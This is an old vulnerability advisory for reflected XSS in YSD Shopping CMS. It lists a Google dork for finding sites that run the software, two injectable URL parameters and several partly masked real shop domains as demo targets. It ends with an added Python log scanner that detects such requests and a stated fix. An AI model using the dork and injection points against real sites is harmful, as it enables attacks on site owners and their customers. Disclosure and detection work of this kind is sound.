Exploit Title: XSS Vulnerability In YSD Shoping CMS
Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:"/product_list.php?bid=" , intext:"Designed by YSD"
Tested on: Windows and Linux

Exploit :

http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]

Demo :

www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss
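
Detection example (added here, not part of the original advisory or the vendor's code): a scan of web server access logs for requests to the two endpoints listed above whose search_key or bid value carries HTML markup characters. The combined log format, the sample log lines, and the treatment of bid as a numeric identifier are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> reflected parameter, as listed in the advisory.
REFLECTED = {"/search_result.php": "search_key", "/product_list.php": "bid"}
# Characters needed to break out of HTML text or an attribute value.
MARKUP = re.compile(r"[<>\"'`]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious(value, param):
    """Return a reason string when the value looks like injected markup, else None."""
    if MARKUP.search(value):
        return "markup characters"
    if param == "bid" and not value.isdigit():
        # Assumption: bid is a numeric identifier, so anything else is anomalous.
        return "non-numeric bid"
    return None


def scan(lines):
    """Yield (line_no, path, param, reason) for each flagged request."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        param = REFLECTED.get(url.path)
        if param is None:
            continue
        # parse_qs percent-decodes the values, so %3C is seen as "<".
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = suspicious(value, param)
            if reason:
                yield no, url.path, param, reason


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [13/Sep/2013:10:00:01 +0000] "GET /product_list.php?bid=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [13/Sep/2013:10:00:05 +0000] "GET /search_result.php?search_key=%22%3E%3Cb%3Etest HTTP/1.1" 200 4312',
    '192.0.2.11 - - [13/Sep/2013:10:00:09 +0000] "GET /product_list.php?bid=xss HTTP/1.1" 200 4100',
    '192.0.2.12 - - [13/Sep/2013:10:00:12 +0000] "GET /search_result.php?search_key=baby+shoes HTTP/1.1" 200 6001',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Hits show where to look in the logs; the fix itself is HTML-encoding both parameters on output and validating bid server-side.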